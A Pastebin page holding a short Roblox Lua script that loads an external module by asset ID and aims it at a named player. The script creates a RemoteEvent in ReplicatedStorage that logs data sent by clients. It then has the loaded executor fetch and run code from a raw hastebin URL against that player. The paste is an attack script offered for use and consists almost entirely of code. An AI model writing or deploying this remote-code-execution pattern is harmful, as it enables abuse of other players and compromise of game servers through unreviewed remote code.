Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local SBExe=require(382739820)
- targets = {"xXMrTiamo555Xx"}
- function Shortner(X)
- if not (string.lower(type(X))=='string') then
- return nil;
- end;
- local NL = 0;
- for i = 1,string.len(X) do
- NL = i;
- end;
- for _, players in pairs (game:GetService('Players'):GetPlayers()) do
- if (string.sub(string.lower(players.Name),1,NL)==(string.lower(X))) then
- return players;
- end;
- end;
- return nil;
- end
- if game.ReplicatedStorage:FindFirstChild("thisThingIsRandom") then
- game.ReplicatedStorage:FindFirstChild("thisThingIsRandom"):remove()
- end
- local a = Instance.new("RemoteEvent",game.ReplicatedStorage)
- a.Name = "thisThingIsRandom"
- a.OnServerEvent:connect(function(plr, args)
- print(plr.Name..": "..args)
- end)
- for i,v in pairs(targets) do
- SBExe("hl/http://www.hastebin.com/raw/oceguyovak",Shortner(v).Name)
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement